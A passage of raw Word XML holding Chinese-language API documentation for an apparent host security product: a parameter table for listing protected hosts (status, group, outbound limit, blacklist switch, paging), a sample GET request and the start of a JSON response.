        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17210ECA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A410F75" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>访问控制模式：null全部 0服务控制 1主机控制</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="49323CF7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F38F2BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66C4E784" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AF2AF43" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B3A5DEE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="01F317B1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2759B0D7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36E1EB2B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="140799E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02A7FF20" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机id数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="284B4034" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65E08318" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71121D7B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F01F436" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6902B79F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2544D6FA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69EAE4E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>onlineStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="735B6B58" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1532067B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B2F6BBC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>在线状态,0离线 1在线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="23B4653E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CF7F9D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>available</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30381F05" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="740AD6F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EE57488" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否可用: no 不可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3D114EEB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A9CBB36" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>runStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49C6EF97" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FE2600D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A8BB7A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>运行状态，运行状态: warn告警 monitor监控 protect防护</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="56E13C26" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C0D71A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>limitOut</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0ACCE251" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7112F312" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F03FBD6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>出站限制,0不允许出站 1允许出站</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3B25CA59" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19CD5DF1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76999BBF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DF8ED3D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51B22AEE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="77DD333C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33D082A9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>runLevel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61316E6D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40662E0E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B019C7D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>运行级别：0正常 1降级 2停用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="797C37D7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C037E1A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>page</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D09AEA5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="677DCBE0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60034BB5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>分页的页数，默认0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4A3D5CA9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D77322F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50CD114F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="661DF48A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="263B411A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>分页的大小，默认50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="548D4F1E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F188D8C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>sorts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BFAF8A4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4621A20A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13523A25" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>排序字段,多个用逗号隔开,sorts字段的约定不写表示升序，"-"表示降序</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4CC02CCF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C211C25" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>blockingSwitch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D41A703" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AB0E353" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F0DBAB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>拦截记录开关</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1764C2B1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0383DBA4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>blockingState</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="748DDF44" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01BB38DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0680D47F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>拦截记录状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="16E881D8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F8DAD67" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>blackStrategyEnable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4941F9FC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0320052A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E72D87F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否开启黑名单开关, true-是，false-否</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70C9EFB1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFD4A4C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/ms-srv/api/hosts/list?page=0&amp;size=50&amp;groups=1,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4917F5CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373D185B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"success": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"errorCode": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"errorDesc": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"data": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"total": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"rows": [{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"agentId": "63042b6fc7de70f2",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"onlineStatus": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"displayIp": "10.0.2.15",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"displayIpBak": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">"ips": ["192.168.56.105", "fe80::94c1:b476:6605:a0e6", "10.0.2.15", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"fe80::4fd9:7a78:5b7c:e3ea"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"hostname": "localhost.localdomain",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"group": 5,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"groupName": "licai",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"tags": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"msEnabled": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"dcSyncNum": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"dcNotSyncNum": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"accessControlMode": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"platform": "CentOS Linux release 7.9.2009 (Core)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"runStatus": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"protectService": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"limitOut": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"blockingSwitch": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"checkStatus": "success",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"available": "yes",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"availableReason": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"osType": 1,</w:t>
      </w:r>
